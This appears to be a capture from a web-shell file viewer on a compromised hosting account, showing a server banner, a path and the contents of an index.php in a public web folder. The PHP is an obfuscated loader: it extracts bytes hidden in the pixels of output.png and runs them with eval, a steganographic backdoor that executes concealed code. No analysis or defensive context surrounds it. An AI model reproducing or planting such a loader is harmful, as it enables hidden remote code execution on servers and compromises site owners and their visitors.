Linux premium92.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Path : /home/bajcrwht/public_html/2e3543/ |
Current File : /home/bajcrwht/public_html/2e3543/index.php |
<?php $png = file_get_contents('output.png'); $im = imagecreatefromstring($png); $width = imagesx($im); $height = imagesy($im); $row = $height > 1 ? 1 : 0; $code = ''; for ($x = 0; $x < $width; $x++) { $rgb = imagecolorat($im, $x, $row); $code .= chr(($rgb >> 16) & 0xFF) . chr(($rgb >> 8) & 0xFF) . chr($rgb & 0xFF); } imagedestroy($im); eval('?>' . rtrim($code, "\0"));